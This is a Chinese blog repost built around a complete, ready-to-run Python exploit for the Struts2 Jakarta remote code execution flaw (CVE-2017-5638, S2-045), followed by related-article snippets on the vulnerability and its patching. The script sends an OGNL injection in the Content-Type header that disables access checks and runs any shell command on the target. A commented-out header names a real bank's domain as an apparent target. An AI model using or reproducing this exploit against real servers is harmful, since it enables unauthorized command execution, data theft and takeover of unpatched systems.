Struts2 Jakarta远程执行代码测试

最新推荐文章于 2020-12-10 04:24:47 发布
最新推荐文章于 2020-12-10 04:24:47 发布
阅读量241 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java 操作系统
原文链接:https://my.oschina.net/403/blog/853757
本文介绍了一个针对 Struts2 Jakarta 远程代码执行漏洞 (CVE-2017-5638) 的 Python 利用脚本。该脚本通过特定的 payload 向易受攻击的 Struts2 服务器发送请求,以执行任意命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

为什么80%的码农都做不了架构师?>>>   hot3.png

#coding:utf8
#author:Gru-HT
#time:下午4:30 07 03 2017
#information:struts2 Jakarta远程执行 cve-2017-5638 S02-45


import requests,sys
def st245(urls,ossystem):
    payload="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+ossystem+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    head={
        #"Host":'easyfee.esunbank.com.tw',
        "User-Agent":"User-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept":"Accept=*/*",
        "Accept-Language":"Accept-Language=en-US,en;q=0.5",
        "Content-Type":payload,
        "Connection":"keep-alive"
    }
    attack=requests.get(urls,headers=head)
    print attack.text

if __name__=='__main__':
    try:
        url=sys.argv[1]
        ossystems=sys.argv[2]
        st245(url,ossystems)
    except:
        print u"请检查测试语法是否正确,格式为:测试脚本 目标地址 系统命令\n举个栗子:st2-045.py 'http://a.a.a/n.action' whoami"

 

转载于:https://my.oschina.net/403/blog/853757

复现S2-045远程代码执行漏洞
weixin_67813445的博客
03-28 281
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。
S2-016 远程代码执行漏洞
玄道的网安博客
06-29 1123
前言 Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。并且jakarta默认是开启的 实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分 影响版本 Struts 2.3.5 - Struts 2.3.31, Struts 2..
Struts2远程命令执行验证工具
11-22
Struts2漏洞检查工具,可快速检测struts命令执行漏洞,支持批量导入验证,存在可利用的漏洞后,可远程执行命令及文件上传等操作。方便管理人员了解其危害。
JakartaEE Struts2使用
mazaiting的博客
05-03 444
1. Struts2下载 解压后的目录结构如下: 图1.png 从一个高水平角度看,Struts2 是一个MVC拉动的(或MVC2)框架,Struts2 的模型-视图-控制器模式是通过以下五个核心部分进行实现的: 操作(Actions) 拦截器(Interceptors) 值栈(Value Stack)/OGNL 结果(Result)/...
struts2 使用 jakarta 上传文件时commons fileupload的异常捕捉
weixin_34326179的博客
07-19 244
2019独角兽企业重金招聘Python工程师标准>>> ...
Jakarta Struts2
09-05
Jakarta Struts2
struts2远程执行
..7a.
10-19 2659
Struts2的核心是使用的webwork框架,而webwork又是使用的XWork来处理action的,并且通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数: user.address.city=Bishkek&user['favoriteDrink']=kumys ONGL将它转
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.322.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-...
Struts 2远程代码执行漏洞(s2-045/s2-046)修复包详解
总结来说,修复 Struts 2 远程代码执行漏洞 s2-045 和 s2-046 需要开发者执行一系列紧密相连的步骤,包括严格的输入验证、及时的框架升级、下载和替换相关依赖包、彻底的功能验证和测试,以及后续的安全监控和维护。...
Struts2 2.5.10.1版本修复远程代码执行漏洞
在描述中提到的“修复S2-045:Struts 2远程执行代码漏洞”,这是一个在Struts2框架中被发现的安全漏洞,编号为S2-045。该漏洞涉及到远程代码执行(RCE),这在安全领域内是一个非常严重的风险,因为它允许攻击者远程...
apache struts2
09-13
apache struts2, what's the spring, and how do we use it
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法
Coisini的博客
05-27 568
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法 近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架-Struts2存在远程代码执行的严重漏洞。 漏洞编号: S2-045,CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述: Apache St...
struts2漏洞_有没有兴趣研究Remote Code Execution漏洞利用?
weixin_39899244的博客
12-10 467
本期文档内容为:《S2-045 Remote Code Execution漏洞利用》作者介绍:Fhawkz福建师范大学18级学生,国科学生会安全团队的一员,本人对技术喜欢进行钻研,平时也爱鼓捣一些安全的相关技术,本次分享是自己在日常学习中有用到的一些技术,希望给大家带来一些安全学习上的帮助。0x00漏洞背景Struts2是第二代基于Model-View-Controller(MVC)模型的java...
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行
ploto_cs的博客
09-11 1839
Struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行 一.漏洞介绍 (一)编号 S2-057 (二)概述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去 (三)影响版本 Apache Struts 2.3 – Struts 2.3.34 Apache Struts 2.5 – Struts
运用Jakarta Struts的七大实战心法2
jinyan798的专栏
07-23 188
创建独立的Struts配置文件   每个Struts应用模块必须拥有自己的配置文件。允许创建自己的独立于其他模块的Action,ActionForm,异常处理甚至更多。       继续以上面的商店应用程序为例,我们可以创建以下的配置文件:一个文件名为struts-config-catalog.xml,包含catalog(商 品目录)、items(商品清单)、和其它与库存相关的功能的配置...
Struts2和Servlet冲突问题
qq_37967813的博客
02-28 497
使用struts框架时,struts会把servlet给过滤掉,浏览器拿不到页面,怎么办呢 请看: 把每个servlet的web.xml 修改一下,修改对应的servlet-mapping的url-pattern,末尾加上 .servlet,注意,前面有个点 ,然后项目里面其他地方使用时就用这个带.servlet的地址就搞定了 <servlet-mapping> <s...
Jakarta Struts 项目的介绍和它的支持组件
blue00007的专栏
11-27 1507
转载 Jakarta Struts 项目的介绍和它的支持组件我们所有的章节的Web服务器都是基于Jakarta Tomcat容器。在本章结束的时候,通过运行你建立的Struts应用程序,你可以对Struts的框架机制有个大致的了解 The Jakarta Struts项目The Jakarta Struts项目是由Apache Software Foundation发起的开源项
谁在频繁的访问我的服务器接口?请和我联系
weixin_34293911的博客
05-07 204
        今天我到GAE的后台一看,吓了我一跳,显示我的应用的访问数狂涨:         分析一下日志发现,有一个User-Agent为"Jakarta Commons-HttpClient/3.1,gzip(gfe)"的应用在非常频繁的访问我的服务器的rgeo_ll接口,而且GAE后台显示,这个服务达到了每秒50次的连接,这是比较吓人的,虽然我的这个服务性能很高(平均CPU在50以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值